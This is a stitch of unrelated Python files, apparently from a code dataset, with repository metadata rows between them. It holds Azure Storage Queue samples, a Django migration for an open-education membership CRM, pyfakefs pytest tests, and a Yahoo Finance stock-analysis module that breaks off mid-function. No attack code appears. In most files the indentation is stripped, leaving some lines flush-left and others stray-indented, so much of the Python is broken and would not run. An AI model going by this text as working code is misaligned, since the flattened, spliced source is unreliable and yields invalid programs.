queue = QueueClient.from_connection_string(self.connection_string, "myqueue2")
# Create the queue
queue.create_queue()
try:
# [START set_queue_metadata]
metadata = {'foo': 'val1', 'bar': 'val2', 'baz': 'val3'}
queue.set_queue_metadata(metadata=metadata)
# [END set_queue_metadata]
# [START get_queue_properties]
properties = queue.get_queue_properties().metadata
# [END get_queue_properties]
finally:
# Delete the queue
queue.delete_queue()
def send_and_receive_messages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue3")
# Create the queue
queue.create_queue()
try:
# [START send_messages]
queue.send_message(u"message1")
queue.send_message(u"message2", visibility_timeout=30) # wait 30s before becoming visible
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
# [END send_messages]
# [START receive_messages]
# Receive messages one-by-one
messages = queue.receive_messages()
for msg in messages:
print(msg.content)
# Receive messages by batch
messages = queue.receive_messages(messages_per_page=5)
for msg_batch in messages.by_page():
for msg in msg_batch:
print(msg.content)
queue.delete_message(msg)
# [END receive_messages]
# Only prints 4 messages because message 2 is not visible yet
# >>message1
# >>message3
# >>message4
# >>message5
finally:
# Delete the queue
queue.delete_queue()
def list_message_pages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue4")
# Create the queue
queue.create_queue()
try:
queue.send_message(u"message1")
queue.send_message(u"message2")
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
queue.send_message(u"message6")
# [START receive_messages_listing]
# Store two messages in each page
message_batches = queue.receive_messages(messages_per_page=2).by_page()
# Iterate through the page lists
print(list(next(message_batches)))
print(list(next(message_batches)))
            # The last page also contains two messages.
last_page = next(message_batches)
for message in last_page:
print(message)
# [END receive_messages_listing]
finally:
queue.delete_queue()
def delete_and_clear_messages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue5")
# Create the queue
queue.create_queue()
try:
# Send messages
queue.send_message(u"message1")
queue.send_message(u"message2")
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
# [START delete_message]
# Get the message at the front of the queue
msg = next(queue.receive_messages())
# Delete the specified message
queue.delete_message(msg)
# [END delete_message]
# [START clear_messages]
queue.clear_messages()
# [END clear_messages]
finally:
# Delete the queue
queue.delete_queue()
def peek_messages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue6")
# Create the queue
queue.create_queue()
try:
# Send messages
queue.send_message(u"message1")
queue.send_message(u"message2")
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
# [START peek_message]
# Peek at one message at the front of the queue
msg = queue.peek_messages()
            # Peek at up to 5 messages from the front of the queue
            messages = queue.peek_messages(max_messages=5)
            # Print the peeked messages
for message in messages:
print(message.content)
# [END peek_message]
finally:
# Delete the queue
queue.delete_queue()
def update_message(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue7")
# Create the queue
queue.create_queue()
try:
# [START update_message]
# Send a message
queue.send_message(u"update me")
# Receive the message
messages = queue.receive_messages()
# Update the message
list_result = next(messages)
message = queue.update_message(
list_result.id,
pop_receipt=list_result.pop_receipt,
visibility_timeout=0,
content=u"updated")
# [END update_message]
finally:
# Delete the queue
queue.delete_queue()
if __name__ == '__main__':
sample = QueueMessageSamples()
sample.set_access_policy()
sample.queue_metadata()
sample.send_and_receive_messages()
sample.list_message_pages()
sample.delete_and_clear_messages()
sample.peek_messages()
sample.update_message()
| 33.168421 | 102 | 0.602031 |
aedc65a505792ce89b7ef7e5b4ce9f9e0203a237 | 38,024 | py | Python | members/crm/migrations/0001_initial.py | ocwc/ocwc-members | 3ede8e0ff830e2aaff4ae09f9aaefd3eaa83146b | [
"MIT"
] | null | null | null | members/crm/migrations/0001_initial.py | ocwc/ocwc-members | 3ede8e0ff830e2aaff4ae09f9aaefd3eaa83146b | [
"MIT"
] | 7 | 2015-11-27T15:59:52.000Z | 2022-01-13T00:38:38.000Z | members/crm/migrations/0001_initial.py | ocwc/ocwc-members | 3ede8e0ff830e2aaff4ae09f9aaefd3eaa83146b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Address",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"address_type",
models.CharField(
default=b"primary",
max_length=25,
choices=[
(b"primary", b"Primary Address"),
(b"billing", b"Billing Address"),
],
),
),
(
"street_address",
models.CharField(
help_text=b"Street address with street number",
max_length=255,
blank=True,
),
),
(
"supplemental_address_1",
models.CharField(max_length=255, blank=True),
),
(
"supplemental_address_2",
models.CharField(max_length=255, blank=True),
),
("city", models.CharField(max_length=255, blank=True)),
("postal_code", models.CharField(max_length=50, blank=True)),
("postal_code_suffix", models.CharField(max_length=255, blank=True)),
("state_province", models.CharField(max_length=255, blank=True)),
("state_province_abbr", models.CharField(max_length=255, blank=True)),
("latitude", models.FloatField(null=True, blank=True)),
("longitude", models.FloatField(null=True, blank=True)),
],
),
migrations.CreateModel(
name="BillingLog",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"log_type",
models.CharField(
max_length=30,
choices=[
(b"create_invoice", b"Create new invoice"),
(b"send_invoice", b"Send invoice via email"),
(b"create_paid_invoice", b"Create paid invoice"),
(b"send_paid_invoice", b"Send paid invoice via email"),
(b"create_note", b"Add a note"),
],
),
),
("pub_date", models.DateTimeField(auto_now_add=True)),
(
"created_date",
models.DateField(
null=True, verbose_name=b"Created Date (year-month-day)"
),
),
("amount", models.IntegerField(null=True)),
(
"email",
models.CharField(
max_length=120, verbose_name=b"Recepient email", blank=True
),
),
("invoice_year", models.CharField(default=b"2017", max_length=10)),
(
"invoice_number",
models.CharField(max_length=60, null=True, blank=True),
),
("description", models.TextField(default=b"", blank=True)),
("note", models.TextField(blank=True)),
(
"email_subject",
models.CharField(
max_length=140, verbose_name=b"Subject", blank=True
),
),
("email_body", models.TextField(verbose_name=b"Message", blank=True)),
],
),
migrations.CreateModel(
name="Contact",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"contact_type",
models.IntegerField(
choices=[
(4, b"Employee of"),
(6, b"Lead Contact for"),
(9, b"Certifier for"),
(10, b"Voting Representative"),
(11, b"Affiliated with"),
(12, b"AC Member of"),
]
),
),
("email", models.EmailField(max_length=255)),
(
"first_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"last_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"job_title",
models.CharField(default=b"", max_length=255, blank=True),
),
("bouncing", models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name="Continent",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("name", models.CharField(unique=True, max_length=192, blank=True)),
],
),
migrations.CreateModel(
name="Country",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("name", models.CharField(unique=True, max_length=192, blank=True)),
("iso_code", models.CharField(unique=True, max_length=6, blank=True)),
("developing", models.BooleanField()),
(
"continent",
models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to="crm.Continent",
null=True,
),
),
],
options={"ordering": ("name",)},
),
migrations.CreateModel(
name="Invoice",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"invoice_type",
models.CharField(
default=b"issued",
max_length=30,
choices=[
(b"issued", b"Normal issued invoice"),
(b"paid", b"Invoice with paid watermark"),
],
),
),
("invoice_number", models.CharField(max_length=30, blank=True)),
("invoice_year", models.CharField(default=b"2017", max_length=10)),
("amount", models.IntegerField()),
("description", models.TextField(blank=True)),
("pdf_filename", models.CharField(max_length=100, blank=True)),
("access_key", models.CharField(max_length=32, blank=True)),
(
"created_date",
models.DateField(
null=True, verbose_name=b"Created Date (year-month-day)"
),
),
("paypal_link", models.TextField(blank=True)),
("pub_date", models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name="LoginKey",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("email", models.EmailField(max_length=254)),
("key", models.CharField(max_length=32)),
("used", models.BooleanField(default=False)),
("pub_date", models.DateTimeField(auto_now_add=True)),
(
"user",
models.ForeignKey(
on_delete=models.CASCADE, to=settings.AUTH_USER_MODEL
),
),
],
),
migrations.CreateModel(
name="MembershipApplication",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"membership_type",
models.IntegerField(
default=None,
max_length=10,
null=True,
blank=True,
choices=[
(5, b"Institutional Members"),
(10, b"Institutional Members - MRC"),
(11, b"Institutional Members - DC"),
(12, b"Institutional Members - DC - MRC"),
(9, b"Associate Institutional Members"),
(17, b"Associate Institutional Members - DC"),
(6, b"Organizational Members"),
(13, b"Organizational Members - DC"),
(18, b"Organizational Members - MRC"),
(7, b"Associate Consortium Members"),
(14, b"Associate Consortium Members - DC"),
(8, b"Corporate Members - Basic"),
(15, b"Corporate Members - Premium"),
(16, b"Corporate Members - Sustaining"),
],
),
),
(
"display_name",
models.CharField(
max_length=255, verbose_name=b"Institution Name", blank=True
),
),
("edit_link_key", models.CharField(max_length=255, blank=True)),
("view_link_key", models.CharField(max_length=255, blank=True)),
(
"description",
models.TextField(
help_text=b"Please write between 1000 \xe2\x80\x93 1500 characters. <br />This information will be publicly displayed on your OEG profile site.",
blank=True,
),
),
("legacy_application_id", models.IntegerField(null=True, blank=True)),
("legacy_entity_id", models.IntegerField(null=True, blank=True)),
(
"main_website",
models.CharField(
max_length=765, verbose_name="Main Website address", blank=True
),
),
(
"ocw_website",
models.CharField(
max_length=765,
verbose_name="Open Educational Resources (OER) or OpenCourseWare (OCW) Website",
blank=True,
),
),
(
"logo_large",
models.ImageField(
upload_to=b"logos",
max_length=765,
verbose_name="Logo of your institution (at least 500x500px PNG or a vector (PDF, EPS) file)",
blank=True,
),
),
("logo_small", models.CharField(max_length=765, blank=True)),
("rss_course_feed", models.CharField(max_length=765, blank=True)),
("rss_referral_link", models.CharField(max_length=765, blank=True)),
(
"rss_course_feed_language",
models.CharField(max_length=765, blank=True),
),
("agreed_to_terms", models.CharField(max_length=765, blank=True)),
("agreed_criteria", models.CharField(max_length=765, blank=True)),
("contract_version", models.CharField(max_length=765, blank=True)),
("ocw_software_platform", models.CharField(max_length=765, blank=True)),
("ocw_platform_details", models.TextField(blank=True)),
("ocw_site_hosting", models.CharField(max_length=765, blank=True)),
("ocw_site_approved", models.NullBooleanField()),
(
"ocw_published_languages",
models.CharField(max_length=765, blank=True),
),
("ocw_license", models.CharField(max_length=765, blank=True)),
(
"organization_type",
models.CharField(
default=b"",
max_length=765,
blank=True,
choices=[
(b"university", b"Higher Education Institution"),
(b"npo", b"Non-Profit Organization"),
(b"ngo", b"Non-Governmental Organization"),
(b"regionalconsortium", b"Regional Consortium"),
(b"software", b"Software Development"),
(b"commercial", b"Commercial Entity"),
],
),
),
(
"institution_type",
models.CharField(
default=b"",
max_length=25,
blank=True,
choices=[
(b"higher-ed", b"Higher Education Institution"),
(b"secondary-ed", b"Secondary Education Institution"),
(b"primary-ed", b"Primary Education Institution"),
(b"npo", b"Non-Profit Organization"),
(b"ngo", b"Non-Governmental Organization"),
(b"igo", b"Intergovernmental Organization (IGO)"),
(b"gov", b"Governmental Entity"),
(b"consortium", b"Regional Consortium"),
(b"software", b"Software Development"),
(b"commercial", b"Commercial Entity"),
],
),
),
(
"is_accredited",
models.NullBooleanField(
default=None, choices=[(1, b"Yes"), (0, b"No")]
),
),
(
"accreditation_body",
models.CharField(default=b"", max_length=765, blank=True),
),
("ocw_launch_date", models.DateTimeField(null=True, blank=True)),
("support_commitment", models.TextField(blank=True)),
(
"app_status",
models.CharField(
blank=True,
max_length=255,
choices=[
(b"Submitted", b"Submitted"),
(b"Committee", b"Sent to Committee"),
(b"Approved", b"Approved"),
(b"Rejected", b"Rejected"),
(b"Spam", b"Spam"),
(b"RequestedMoreInfo", b"Requested more information"),
],
),
),
("created", models.DateTimeField(auto_now_add=True, null=True)),
("modified", models.DateTimeField(blank=True)),
(
"street_address",
models.CharField(
help_text=b"Street address with a street number",
max_length=255,
blank=True,
),
),
(
"supplemental_address_1",
models.CharField(
max_length=255, verbose_name="Street Address 2", blank=True
),
),
(
"supplemental_address_2",
models.CharField(
max_length=255, verbose_name="Street Address 3", blank=True
),
),
("city", models.CharField(max_length=255, blank=True)),
("postal_code", models.CharField(max_length=50, blank=True)),
(
"state_province",
models.CharField(
max_length=255, verbose_name="State/Province", blank=True
),
),
("email", models.EmailField(max_length=255, blank=True)),
(
"first_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"last_name",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"job_title",
models.CharField(default=b"", max_length=255, blank=True),
),
(
"simplified_membership_type",
models.CharField(
blank=True,
max_length=255,
choices=[
(b"institutional", b"Institutional Member"),
(b"associate", b"Associate Consortium Member"),
(b"organizational", b"Organizational Member"),
(b"corporate", b"Corporate Member"),
],
),
),
(
"corporate_support_levels",
models.CharField(
blank=True,
max_length=255,
choices=[
(b"basic", b"Basic - $1,000 annual membership fee"),
(
b"sustaining",
b"Sustaining - $30,000 contribution annual membership fee",
),
(
b"bronze",
b"Bronze - $60,000 contribution annual membership fee",
),
(
b"silver",
b"Silver - $100,000 contribution annual membership fee",
),
(
b"gold",
b"Gold - $150,000 contribution annual membership fee",
),
(
b"platinum",
b"Platinum - $250,000 contribution annual membership fee",
),
],
),
),
(
"associate_consortium",
models.CharField(
default=b"",
max_length=255,
blank=True,
choices=[
(
b"CCCOER",
b"Community College Consortium for Open Educational Resources (CCCOER)",
),
(b"CORE", b"CORE"),
(b"JOCWC", b"Japan OCW Consortium"),
(b"KOCWC", b"Korea OCW Consortium"),
(b"TOCWC", b"Taiwan OCW Consortium"),
(b"Turkish OCWC", b"Turkish OpenCourseWare Consortium"),
(b"UNIVERSIA", b"UNIVERSIA"),
(b"FOCW", b"OCW France"),
(b"OTHER", b"OTHER"),
],
),
),
("moa_terms", models.NullBooleanField()),
("terms_of_use", models.NullBooleanField()),
("coppa", models.NullBooleanField()),
(
"initiative_description1",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url1",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description2",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url2",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description3",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url3",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"country",
models.ForeignKey(
on_delete=models.CASCADE,
related_name="app_country",
blank=True,
to="crm.Country",
null=True,
),
),
(
"institution_country",
models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to="crm.Country",
null=True,
),
),
],
),
migrations.CreateModel(
name="MembershipApplicationComment",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("legacy_comment_id", models.IntegerField(blank=True)),
("legacy_app_id", models.IntegerField(blank=True)),
("comment", models.TextField(blank=True)),
("sent_email", models.BooleanField(default=False)),
("app_status", models.CharField(max_length=255, blank=True)),
("created", models.DateTimeField()),
(
"application",
models.ForeignKey(
on_delete=models.CASCADE, to="crm.MembershipApplication"
),
),
],
),
migrations.CreateModel(
name="Organization",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("legal_name", models.CharField(max_length=255, blank=True)),
(
"display_name",
models.CharField(
max_length=255, verbose_name=b"Name of the organization"
),
),
("slug", models.CharField(default=b"", unique=True, max_length=30)),
(
"membership_type",
models.IntegerField(
max_length=10,
choices=[
(5, b"Institutional Members"),
(10, b"Institutional Members - MRC"),
(11, b"Institutional Members - DC"),
(12, b"Institutional Members - DC - MRC"),
(9, b"Associate Institutional Members"),
(17, b"Associate Institutional Members - DC"),
(6, b"Organizational Members"),
(13, b"Organizational Members - DC"),
(18, b"Organizational Members - MRC"),
(7, b"Associate Consortium Members"),
(14, b"Associate Consortium Members - DC"),
(8, b"Corporate Members - Basic"),
(15, b"Corporate Members - Premium"),
(16, b"Corporate Members - Sustaining"),
],
),
),
(
"membership_status",
models.IntegerField(
max_length=10,
choices=[
(1, b"Applied"),
(2, b"Current"),
(3, b"Grace"),
(4, b"Expired"),
(5, b"Pending"),
(6, b"Cancelled"),
(7, b"Sustaining"),
(99, b"Example"),
],
),
),
(
"associate_consortium",
models.CharField(
default=b"",
max_length=255,
blank=True,
choices=[
(
b"CCCOER",
b"Community College Consortium for Open Educational Resources (CCCOER)",
),
(b"CORE", b"CORE"),
(b"JOCWC", b"Japan OCW Consortium"),
(b"KOCWC", b"Korea OCW Consortium"),
(b"TOCWC", b"Taiwan OCW Consortium"),
(b"Turkish OCWC", b"Turkish OpenCourseWare Consortium"),
(b"UNIVERSIA", b"UNIVERSIA"),
(b"FOCW", b"OCW France"),
(b"OTHER", b"OTHER"),
],
),
),
(
"crmid",
models.CharField(
help_text=b"Legacy identifier", max_length=255, blank=True
),
),
("main_website", models.TextField(max_length=255, blank=True)),
(
"ocw_website",
models.TextField(
max_length=255, verbose_name=b"OCW Website", blank=True
),
),
("description", models.TextField(blank=True)),
(
"logo_large",
models.ImageField(max_length=255, upload_to=b"logos", blank=True),
),
(
"logo_small",
models.ImageField(max_length=255, upload_to=b"logos", blank=True),
),
("rss_course_feed", models.CharField(max_length=255, blank=True)),
(
"accreditation_body",
models.CharField(default=b"", max_length=255, blank=True),
),
("support_commitment", models.TextField(default=b"", blank=True)),
("created", models.DateTimeField(auto_now_add=True, null=True)),
(
"institution_type",
models.CharField(
default=b"",
max_length=25,
blank=True,
choices=[
(b"higher-ed", b"Higher Education Institution"),
(b"secondary-ed", b"Secondary Education Institution"),
(b"primary-ed", b"Primary Education Institution"),
(b"npo", b"Non-Profit Organization"),
(b"ngo", b"Non-Governmental Organization"),
(b"igo", b"Intergovernmental Organization (IGO)"),
(b"gov", b"Governmental Entity"),
(b"consortium", b"Regional Consortium"),
(b"software", b"Software Development"),
(b"commercial", b"Commercial Entity"),
],
),
),
(
"initiative_description1",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url1",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description2",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url2",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"initiative_description3",
models.TextField(
default=b"",
verbose_name=b"Description (100 \xe2\x80\x93 350 characters)",
blank=True,
),
),
(
"initiative_url3",
models.URLField(
default=b"", max_length=255, verbose_name=b"URL", blank=True
),
),
(
"ocw_contact",
models.ForeignKey(
on_delete=models.CASCADE,
related_name="ocw_contact_user",
verbose_name="Primary contact inside OCW",
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"user",
models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
),
migrations.CreateModel(
name="ReportedStatistic",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("report_month", models.CharField(max_length=6)),
("report_year", models.CharField(max_length=12)),
("site_visits", models.IntegerField()),
("orig_courses", models.IntegerField(verbose_name="Original Courses")),
(
"trans_courses",
models.IntegerField(verbose_name="Translated Courses"),
),
(
"orig_course_lang",
models.TextField(
verbose_name="Original Courses Language", blank=True
),
),
(
"trans_course_lang",
models.TextField(
null=True,
verbose_name="Translated Courses Language",
blank=True,
),
),
(
"oer_resources",
models.IntegerField(
null=True, verbose_name="Number of OER Resources", blank=True
),
),
(
"trans_oer_resources",
models.IntegerField(
null=True,
verbose_name="Number of Translated OER Resources",
blank=True,
),
),
(
"comment",
models.TextField(null=True, verbose_name="Comment", blank=True),
),
("report_date", models.DateField(verbose_name="Reported period")),
("last_modified", models.DateTimeField(auto_now_add=True)),
("carry_forward", models.BooleanField(default=False)),
(
"organization",
models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
],
),
migrations.AddField(
model_name="membershipapplication",
name="organization",
field=models.ForeignKey(
on_delete=models.CASCADE,
blank=True,
to="crm.Organization",
help_text=b"Should be empty, unless application is approved",
null=True,
),
),
migrations.AddField(
model_name="invoice",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
migrations.AddField(
model_name="contact",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
migrations.AddField(
model_name="billinglog",
name="invoice",
field=models.ForeignKey(
on_delete=models.CASCADE, blank=True, to="crm.Invoice", null=True
),
),
migrations.AddField(
model_name="billinglog",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
migrations.AddField(
model_name="billinglog",
name="user",
field=models.ForeignKey(
on_delete=models.CASCADE, to=settings.AUTH_USER_MODEL
),
),
migrations.AddField(
model_name="address",
name="country",
field=models.ForeignKey(
on_delete=models.CASCADE, blank=True, to="crm.Country", null=True
),
),
migrations.AddField(
model_name="address",
name="organization",
field=models.ForeignKey(on_delete=models.CASCADE, to="crm.Organization"),
),
]
| 41.018339 | 169 | 0.381917 |
3d40537e043d125442bd81a1cedc883deca3e871 | 293 | py | Python | __init__.py | ponyatov/metaLpy | 96149313e8083536ade1c331825242f6996f05b3 | [
"MIT"
] | null | null | null | __init__.py | ponyatov/metaLpy | 96149313e8083536ade1c331825242f6996f05b3 | [
"MIT"
] | null | null | null | __init__.py | ponyatov/metaLpy | 96149313e8083536ade1c331825242f6996f05b3 | [
"MIT"
] | null | null | null | ## @file
## `metaL`: homoiconic interpreter engine
## (c) Dmitry Ponyatov <<dponyatov@gmail.com>> 2020 MIT
## * homoiconic interpreter engine
## * in-memory object graph database
## * interactive programming system
from .core import *
from .geo import *
from .gui import *
from .web import *
| 24.416667 | 55 | 0.716724 |
b0a79b256b1d75520f8e80e30cfa42a49a26fa40 | 1,396 | py | Python | pyfakefs/pytest_tests/pytest_plugin_test.py | pexip/os-python-pyfakefs | 72a3de0608582f4d25df0ff0528c5a45a5668443 | [
"Apache-2.0"
] | null | null | null | pyfakefs/pytest_tests/pytest_plugin_test.py | pexip/os-python-pyfakefs | 72a3de0608582f4d25df0ff0528c5a45a5668443 | [
"Apache-2.0"
] | null | null | null | pyfakefs/pytest_tests/pytest_plugin_test.py | pexip/os-python-pyfakefs | 72a3de0608582f4d25df0ff0528c5a45a5668443 | [
"Apache-2.0"
] | null | null | null | """Tests that the pytest plugin properly provides the "fs" fixture"""
import os
import tempfile
from pyfakefs.fake_filesystem_unittest import Pause
def test_fs_fixture(fs):
fs.create_file('/var/data/xx1.txt')
assert os.path.exists('/var/data/xx1.txt')
def test_pause_resume(fs):
fake_temp_file = tempfile.NamedTemporaryFile()
assert fs.exists(fake_temp_file.name)
assert os.path.exists(fake_temp_file.name)
fs.pause()
assert fs.exists(fake_temp_file.name)
assert not os.path.exists(fake_temp_file.name)
real_temp_file = tempfile.NamedTemporaryFile()
assert not fs.exists(real_temp_file.name)
assert os.path.exists(real_temp_file.name)
fs.resume()
assert not os.path.exists(real_temp_file.name)
assert os.path.exists(fake_temp_file.name)
def test_pause_resume_contextmanager(fs):
fake_temp_file = tempfile.NamedTemporaryFile()
assert fs.exists(fake_temp_file.name)
assert os.path.exists(fake_temp_file.name)
with Pause(fs):
assert fs.exists(fake_temp_file.name)
assert not os.path.exists(fake_temp_file.name)
real_temp_file = tempfile.NamedTemporaryFile()
assert not fs.exists(real_temp_file.name)
assert os.path.exists(real_temp_file.name)
assert not os.path.exists(real_temp_file.name)
assert os.path.exists(fake_temp_file.name)
| 34.9 | 70 | 0.725645 |
d0eaa43b0025c952520d763665a4e6d19899e070 | 13,177 | py | Python | gamestonk_terminal/fundamental_analysis/yahoo_finance_view.py | keshabb/GamestonkTerminal | a0acdfb13f806c35c82a7c4dc81ea98de52814e0 | [
"MIT"
] | null | null | null | gamestonk_terminal/fundamental_analysis/yahoo_finance_view.py | keshabb/GamestonkTerminal | a0acdfb13f806c35c82a7c4dc81ea98de52814e0 | [
"MIT"
] | 1 | 2022-02-10T06:49:37.000Z | 2022-02-10T06:49:37.000Z | gamestonk_terminal/fundamental_analysis/yahoo_finance_view.py | hcksystem/GamestonkTerminal | 7a8a4f868c548505c36287d16f969e80daeed431 | [
"MIT"
] | null | null | null | """ Yahoo Finance View """
__docformat__ = "numpy"
import argparse
from typing import List
from datetime import datetime
import webbrowser
import yfinance as yf
import pandas as pd
from gamestonk_terminal.fundamental_analysis.fa_helper import clean_df_index
from gamestonk_terminal.helper_funcs import (
long_number_format,
parse_known_args_and_warn,
)
def headquarters(other_args: List[str], ticker: str):
"""Headquarters location of the company
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="hq",
description="""
Opens in Google Maps HQ location of the company. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_info = pd.DataFrame(stock.info.items(), columns=["Metric", "Value"])
df_info = df_info.set_index("Metric")
maps = "https://www.google.com/maps/search/"
for field in ["address1", "address2", "city", "state", "zip", "country"]:
if field in df_info.index:
maps += (
df_info[df_info.index == field]["Value"].values[0].replace(" ", "+")
+ ","
)
webbrowser.open(maps[:-1])
print("")
except Exception as e:
print(e, "\n")
def web(other_args: List[str], ticker: str):
"""Website of the company
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="web",
description="""
Opens company's website. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_info = pd.DataFrame(stock.info.items(), columns=["Metric", "Value"])
webbrowser.open(df_info[df_info["Metric"] == "website"]["Value"].values[0])
print("")
except Exception as e:
print(e, "\n")
def info(other_args: List[str], ticker: str):
"""Yahoo Finance ticker info
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="info",
description="""
Print information about the company. The following fields are expected:
Zip, Sector, Full time employees, Long business summary, City, Phone, State, Country,
Website, Max age, Address, Industry, Previous close, Regular market open, Two hundred
day average, Payout ratio, Regular market day high, Average daily volume 10 day,
Regular market previous close, Fifty day average, Open, Average volume 10 days, Beta,
Regular market day low, Price hint, Currency, Trailing PE, Regular market volume,
Market cap, Average volume, Price to sales trailing 12 months, Day low, Ask, Ask size,
Volume, Fifty two week high, Forward PE, Fifty two week low, Bid, Tradeable, Bid size,
Day high, Exchange, Short name, Long name, Exchange timezone name, Exchange timezone
short name, Is esg populated, Gmt off set milliseconds, Quote type, Symbol, Message
board id, Market, Enterprise to revenue, Profit margins, Enterprise to ebitda, 52 week
change, Forward EPS, Shares outstanding, Book value, Shares short, Shares percent
shares out, Last fiscal year end, Held percent institutions, Net income to common,
Trailing EPS, Sand p52 week change, Price to book, Held percent insiders, Next fiscal
year end, Most recent quarter, Short ratio, Shares short previous month date, Float
shares, Enterprise value, Last split date, Last split factor, Earnings quarterly growth,
Date short interest, PEG ratio, Short percent of float, Shares short prior month,
Regular market price, Logo_url. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_info = pd.DataFrame(stock.info.items(), columns=["Metric", "Value"])
df_info = df_info.set_index("Metric")
clean_df_index(df_info)
if (
"Last split date" in df_info.index
and df_info.loc["Last split date"].values[0]
):
df_info.loc["Last split date"].values[0] = datetime.fromtimestamp(
df_info.loc["Last split date"].values[0]
).strftime("%d/%m/%Y")
df_info = df_info.mask(df_info["Value"].astype(str).eq("[]")).dropna()
df_info[df_info.index != "Zip"] = df_info[df_info.index != "Zip"].applymap(
lambda x: long_number_format(x)
)
df_info = df_info.rename(
index={
"Address1": "Address",
"Average daily volume10 day": "Average daily volume 10 day",
"Average volume10days": "Average volume 10 days",
"Price to sales trailing12 months": "Price to sales trailing 12 months",
}
)
df_info.index = df_info.index.str.replace("eps", "EPS")
df_info.index = df_info.index.str.replace("p e", "PE")
df_info.index = df_info.index.str.replace("Peg", "PEG")
pd.set_option("display.max_colwidth", None)
if "Long business summary" in df_info.index:
print(df_info.drop(index=["Long business summary"]).to_string(header=False))
print("")
print(df_info.loc["Long business summary"].values[0])
print("")
else:
print(df_info.to_string(header=False))
print("")
except Exception as e:
